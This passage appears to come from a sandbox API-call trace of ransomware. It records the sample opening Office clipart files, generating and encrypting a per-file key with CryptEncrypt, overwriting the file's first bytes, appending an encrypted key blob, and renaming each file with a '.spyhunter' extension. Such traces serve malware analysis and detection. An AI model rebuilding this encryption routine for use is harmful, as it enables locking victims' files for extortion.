lpBuffer=0x2c251f8*, lpNumberOfBytesRead=0x248fc7c*=0x2800, lpOverlapped=0x0) returned 1 [0098.347] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.347] WriteFile (in: hFile=0x170, lpBuffer=0x2c251f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fc7c, lpOverlapped=0x0 | out: lpBuffer=0x2c251f8*, lpNumberOfBytesWritten=0x248fc7c*=0x2800, lpOverlapped=0x0) returned 1 [0098.348] GetProcessHeap () returned 0x2c0000 [0098.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c251f8 | out: hHeap=0x2c0000) returned 1 [0098.348] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.348] WriteFile (in: hFile=0x170, lpBuffer=0x248fcbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc7c, lpOverlapped=0x0 | out: lpBuffer=0x248fcbc*, lpNumberOfBytesWritten=0x248fc7c*=0x4, lpOverlapped=0x0) returned 1 [0098.355] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc7c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc7c*=0x30, lpOverlapped=0x0) returned 1 [0098.355] CloseHandle (hObject=0x170) returned 1 [0098.355] GetProcessHeap () returned 0x2c0000 [0098.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.355] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG.spyhunter") returned 77 [0098.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145168.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145168.jpg.spyhunter")) returned 1 [0098.356] GetProcessHeap () returned 0x2c0000 [0098.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.356] GetProcessHeap () returned 0x2c0000 [0098.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0098.356] GetProcessHeap () returned 0x2c0000 [0098.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c28828 | out: hHeap=0x2c0000) returned 1 [0098.356] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcb8 | out: pbBuffer=0x248fcb8) returned 1 [0098.356] GetProcessHeap () returned 0x2c0000 [0098.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0098.356] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcb0*=0x30) returned 1 [0098.356] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0098.357] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 67 [0098.357] StrStrW (lpFirst="J0144773.JPG", lpSrch=".txt") returned 0x0 [0098.357] GetProcessHeap () returned 0x2c0000 [0098.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c251f8 [0098.357] ReadFile (in: hFile=0x170, lpBuffer=0x2c251f8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc74, lpOverlapped=0x0 | out: lpBuffer=0x2c251f8*, lpNumberOfBytesRead=0x248fc74*=0x2800, lpOverlapped=0x0) returned 1 [0098.369] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.369] WriteFile (in: hFile=0x170, lpBuffer=0x2c251f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fc74, lpOverlapped=0x0 | out: lpBuffer=0x2c251f8*, lpNumberOfBytesWritten=0x248fc74*=0x2800, lpOverlapped=0x0) returned 1 [0098.369] GetProcessHeap () returned 0x2c0000 [0098.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c251f8 | out: hHeap=0x2c0000) returned 1 [0098.377] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.377] WriteFile (in: hFile=0x170, lpBuffer=0x248fcb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc74, lpOverlapped=0x0 | out: lpBuffer=0x248fcb4*, lpNumberOfBytesWritten=0x248fc74*=0x4, lpOverlapped=0x0) returned 1 [0098.436] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc74, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc74*=0x30, lpOverlapped=0x0) returned 1 [0098.436] CloseHandle (hObject=0x170) returned 1 [0098.436] GetProcessHeap () returned 0x2c0000 [0098.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.436] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG.spyhunter") returned 77 [0098.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg.spyhunter")) returned 1 [0098.437] GetProcessHeap () returned 0x2c0000 [0098.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.437] GetProcessHeap () returned 0x2c0000 [0098.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0098.437] GetProcessHeap () returned 0x2c0000 [0098.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c28758 | out: hHeap=0x2c0000) returned 1 [0098.437] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcb8 | out: pbBuffer=0x248fcb8) returned 1 [0098.437] GetProcessHeap () returned 0x2c0000 [0098.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0098.437] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fcb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fcb0*=0x30) returned 1 [0098.437] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171685.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0098.516] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 67 [0098.516] StrStrW (lpFirst="J0171685.WMF", lpSrch=".txt") returned 0x0 [0098.516] GetProcessHeap () returned 0x2c0000 [0098.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0098.516] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc74*=0x2800, lpOverlapped=0x0) returned 1 [0098.536] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.536] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fc74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc74*=0x2800, lpOverlapped=0x0) returned 1 [0098.536] GetProcessHeap () returned 0x2c0000 [0098.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0098.536] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.537] WriteFile (in: hFile=0x170, lpBuffer=0x248fcb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc74, lpOverlapped=0x0 | out: lpBuffer=0x248fcb4*, lpNumberOfBytesWritten=0x248fc74*=0x4, lpOverlapped=0x0) returned 1 [0098.546] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc74, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc74*=0x30, lpOverlapped=0x0) returned 1 [0098.546] CloseHandle (hObject=0x170) returned 1 [0098.546] GetProcessHeap () returned 0x2c0000 [0098.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x394fd8 [0098.546] wnsprintfW (in: pszDest=0x394fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF.spyhunter") returned 77 [0098.546] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171685.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171685.wmf.spyhunter")) returned 1 [0098.547] GetProcessHeap () returned 0x2c0000 [0098.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x394fd8 | out: hHeap=0x2c0000) returned 1 [0098.547] GetProcessHeap () returned 0x2c0000 [0098.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0098.547] GetProcessHeap () returned 0x2c0000 [0098.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c2aea8 | out: hHeap=0x2c0000) returned 1 [0098.547] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcb0 | out: pbBuffer=0x248fcb0) returned 1 [0098.548] GetProcessHeap () returned 0x2c0000 [0098.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0098.548] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fca8*=0x30) returned 1 [0098.548] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188667.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0098.549] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF") returned 67 [0098.549] StrStrW (lpFirst="J0188667.WMF", lpSrch=".txt") returned 0x0 [0098.549] GetProcessHeap () returned 0x2c0000 [0098.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0098.549] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fc6c*=0x2800, lpOverlapped=0x0) returned 1 [0098.570] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.570] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fc6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fc6c*=0x2800, lpOverlapped=0x0) returned 1 [0098.570] GetProcessHeap () returned 0x2c0000 [0098.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0098.570] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.570] WriteFile (in: hFile=0x170, lpBuffer=0x248fcac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc6c, lpOverlapped=0x0 | out: lpBuffer=0x248fcac*, lpNumberOfBytesWritten=0x248fc6c*=0x4, lpOverlapped=0x0) returned 1 [0098.571] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc6c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc6c*=0x30, lpOverlapped=0x0) returned 1 [0098.571] CloseHandle (hObject=0x170) returned 1 [0098.571] GetProcessHeap () returned 0x2c0000 [0098.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c721b0 [0098.571] wnsprintfW (in: pszDest=0x2c721b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF.spyhunter") returned 77 [0098.571] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188667.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188667.wmf.spyhunter")) returned 1 [0098.573] GetProcessHeap () returned 0x2c0000 [0098.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c721b0 | out: hHeap=0x2c0000) returned 1 [0098.573] GetProcessHeap () returned 0x2c0000 [0098.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0098.573] GetProcessHeap () returned 0x2c0000 [0098.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x391b50 | out: hHeap=0x2c0000) returned 1 [0098.573] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fcb0 | out: pbBuffer=0x248fcb0) returned 1 [0098.573] GetProcessHeap () returned 0x2c0000 [0098.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0098.573] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fca8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fca8*=0x30) returned 1 [0098.573] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02386_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02386_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0098.579] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02386_.WMF") returned 67 [0098.579] StrStrW (lpFirst="NA02386_.WMF", lpSrch=".txt") returned 0x0 [0098.579] GetProcessHeap () returned 0x2c0000 [0098.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0098.579] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fc6c*=0x948, lpOverlapped=0x0) returned 1 [0098.587] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff6b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.587] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x948, lpNumberOfBytesWritten=0x248fc6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fc6c*=0x948, lpOverlapped=0x0) returned 1 [0098.587] GetProcessHeap () returned 0x2c0000 [0098.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0098.587] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.587] WriteFile (in: hFile=0x170, lpBuffer=0x248fcac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc6c, lpOverlapped=0x0 | out: lpBuffer=0x248fcac*, lpNumberOfBytesWritten=0x248fc6c*=0x4, lpOverlapped=0x0) returned 1 [0098.587] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc6c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc6c*=0x30, lpOverlapped=0x0) returned 1 [0098.587] CloseHandle (hObject=0x170) returned 1 [0098.641] GetProcessHeap () returned 0x2c0000 [0098.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c9e240 [0098.642] wnsprintfW (in: pszDest=0x2c9e240, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02386_.WMF.spyhunter") returned 77 [0098.642] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02386_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02386_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02386_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02386_.wmf.spyhunter")) returned 1 [0098.770] GetProcessHeap () returned 0x2c0000 [0098.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9e240 | out: hHeap=0x2c0000) returned 1 [0098.770] GetProcessHeap () returned 0x2c0000 [0098.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0098.770] GetProcessHeap () returned 0x2c0000 [0098.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b30e0 | out: hHeap=0x2c0000) returned 1 [0098.770] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fca8 | out: pbBuffer=0x248fca8) returned 1 [0098.770] GetProcessHeap () returned 0x2c0000 [0098.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0098.770] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fca0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fca0*=0x30) returned 1 [0098.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01301_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01301_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0098.812] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01301_.GIF") returned 67 [0098.812] StrStrW (lpFirst="WB01301_.GIF", lpSrch=".txt") returned 0x0 [0098.812] GetProcessHeap () returned 0x2c0000 [0098.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0098.812] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fc64*=0x2a9, lpOverlapped=0x0) returned 1 [0098.813] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.813] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2a9, lpNumberOfBytesWritten=0x248fc64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fc64*=0x2a9, lpOverlapped=0x0) returned 1 [0098.813] GetProcessHeap () returned 0x2c0000 [0098.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0098.813] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.813] WriteFile (in: hFile=0x178, lpBuffer=0x248fca4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc64, lpOverlapped=0x0 | out: lpBuffer=0x248fca4*, lpNumberOfBytesWritten=0x248fc64*=0x4, lpOverlapped=0x0) returned 1 [0098.813] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc64, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc64*=0x30, lpOverlapped=0x0) returned 1 [0098.814] CloseHandle (hObject=0x178) returned 1 [0098.814] GetProcessHeap () returned 0x2c0000 [0098.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0098.814] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01301_.GIF.spyhunter") returned 77 [0098.814] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01301_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01301_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01301_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01301_.gif.spyhunter")) returned 1 [0098.815] GetProcessHeap () returned 0x2c0000 [0098.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0098.815] GetProcessHeap () returned 0x2c0000 [0098.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0098.815] GetProcessHeap () returned 0x2c0000 [0098.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb5600 | out: hHeap=0x2c0000) returned 1 [0098.815] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fca8 | out: pbBuffer=0x248fca8) returned 1 [0098.815] GetProcessHeap () returned 0x2c0000 [0098.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0098.815] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fca0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fca0*=0x30) returned 1 [0098.815] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0098.815] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 67 [0098.815] StrStrW (lpFirst="WNTER_01.MID", lpSrch=".txt") returned 0x0 [0098.815] GetProcessHeap () returned 0x2c0000 [0098.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0098.816] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fc64*=0x1b03, lpOverlapped=0x0) returned 1 [0098.861] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffe4fd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.861] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b03, lpNumberOfBytesWritten=0x248fc64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fc64*=0x1b03, lpOverlapped=0x0) returned 1 [0098.861] GetProcessHeap () returned 0x2c0000 [0098.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0098.861] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.861] WriteFile (in: hFile=0x178, lpBuffer=0x248fca4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc64, lpOverlapped=0x0 | out: lpBuffer=0x248fca4*, lpNumberOfBytesWritten=0x248fc64*=0x4, lpOverlapped=0x0) returned 1 [0098.861] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc64, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc64*=0x30, lpOverlapped=0x0) returned 1 [0098.862] CloseHandle (hObject=0x178) returned 1 [0098.863] GetProcessHeap () returned 0x2c0000 [0098.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0098.863] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.spyhunter") returned 77 [0098.863] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: 